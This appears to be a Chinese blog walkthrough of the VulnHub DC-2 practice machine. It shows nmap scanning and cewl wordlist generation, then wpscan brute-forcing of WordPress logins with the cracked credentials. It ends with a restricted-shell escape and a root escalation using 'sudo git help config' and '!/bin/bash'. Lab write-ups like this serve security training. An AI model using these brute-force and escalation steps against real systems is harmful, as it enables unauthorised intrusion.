linux办公网
vulnhub靶机DC2渗透笔记
创始人
2025-05-28 14:38:15
0

信息收集

netdiscover -r 192.168.1.0/24

扫描发现目标机器地址为192.168.1.104

nmap端口扫描

└─$ nmap -A 192.168.1.104 -p-                                                            
                                                                                                                       84 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 5040                                                                                                                                                                          _____________________________________________________________________________IP            At MAC Address     Count     Len  MAC Vendor / Hostname      -----------------------------------------------------------------------------192.168.1.1     64:6e:97:dd:97:9b     71    4260  TP-LINK TECHNOLOGIES CO.,LTD.                                                                                                                                                            192.168.1.104   08:00:27:66:2e:b1      1      60  PCS Systemtechnik GmbH                                                                                                                                                                   192.168.1.107   e4:5e:37:8e:32:4e     12     720  Intel Corporate                                                                                                                                                                          ┌──(ydx㉿xuegod53)-[~]
└─$ nmap -A 192.168.1.104 -p-                                                                                                                                                                                                          130 ⨯
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-15 15:01 CST
Stats: 0:00:08 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 15:01 (0:00:06 remaining)
Nmap scan report for 192.168.1.104
Host is up (0.00023s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Did not follow redirect to http://dc-2/
7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
|   2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
|   256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_  256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

扫描结果开放80和7744端口,web服务和ssh服务

访问80端口访问不了,需要修改hosts文件

访问网站

flag1

找到flag1 他提示我们使用cewl工具(一个字典生成工具)

**cewl具体使用可以参考:**https://www.codercto.com/a/44828.html

生成爆破密码字典

cewl http://dc-2/ > passwd.txt

wpscan扫描WordPress用户

发现三个用户,写入user.txt字典

然后使用wpscan 爆破后台

└─$ wpscan --url http://dc-2/ -U user.txt -P passwd.txt

爆破成功

Username: jerry, Password: adipiscing

Username: tom, Password: parturient

dirb扫后台目录

└─$ dirb http://dc-2/

后台目录:http://dc-2/wp-admin/

登录后台

flag2

根据提示尝试别的方法,通过扫描端口记得还开放了7744端口ssh服务尝试ssh登录

登录之后发现flag3文件,但是查看不了

flag3

vi查看下提示

需要设置一个环境变量:export PATH=$PATH:/bin/ 和 然后就可以查看etc/passwd;

git提权

根据刚刚的提示他应该让我们切换杰瑞用户,还是没有权限

flag4

根据flag4的提示,git提权

sudo git help config
!/bin/bash

flag5

靶场总结

  • cewl 根据url返回字典文件

  • wpsan扫描用户名

  • wpscan爆破后台

  • dirb目录扫描

  • 逃脱受限shell

  • 导入PATH环境变量

  • git提权

思君如满月,夜夜减清辉

词库加载错误:未能找到文件“E:\highferrum_mysql\Configuration\Dict_Stopwords.txt”。

上一篇:力扣-排名靠前的旅行者

下一篇:Python Requests库安装和使用

相关内容

热门资讯

AWSECS:访问外部网络时出... 如果您在AWS ECS中部署了应用程序,并且该应用程序需要访问外部网络,但是无法正常访问,可能是因为...
AWSElasticBeans... 在Dockerfile中手动配置nginx反向代理。例如,在Dockerfile中添加以下代码:FR...
银河麒麟V10SP1高级服务器... 银河麒麟高级服务器操作系统简介: 银河麒麟高级服务器操作系统V10是针对企业级关键业务...
北信源内网安全管理卸载 北信源内网安全管理是一款网络安全管理软件,主要用于保护内网安全。在日常使用过程中,卸载该软件是一种常...
AWR报告解读 WORKLOAD REPOSITORY PDB report (PDB snapshots) AW...
AWS管理控制台菜单和权限 要在AWS管理控制台中创建菜单和权限,您可以使用AWS Identity and Access Ma...
​ToDesk 远程工具安装及... 目录 前言 ToDesk 优势 ToDesk 下载安装 ToDesk 功能展示 文件传输 设备链接 ...
群晖外网访问终极解决方法:IP... 写在前面的话 受够了群晖的quickconnet的小水管了,急需一个新的解决方法&#x...
不能访问光猫的的管理页面 光猫是现代家庭宽带网络的重要组成部分,它可以提供高速稳定的网络连接。但是,有时候我们会遇到不能访问光...
Azure构建流程(Power... 这可能是由于配置错误导致的问题。请检查构建流程任务中的“发布构建制品”步骤,确保正确配置了“Arti...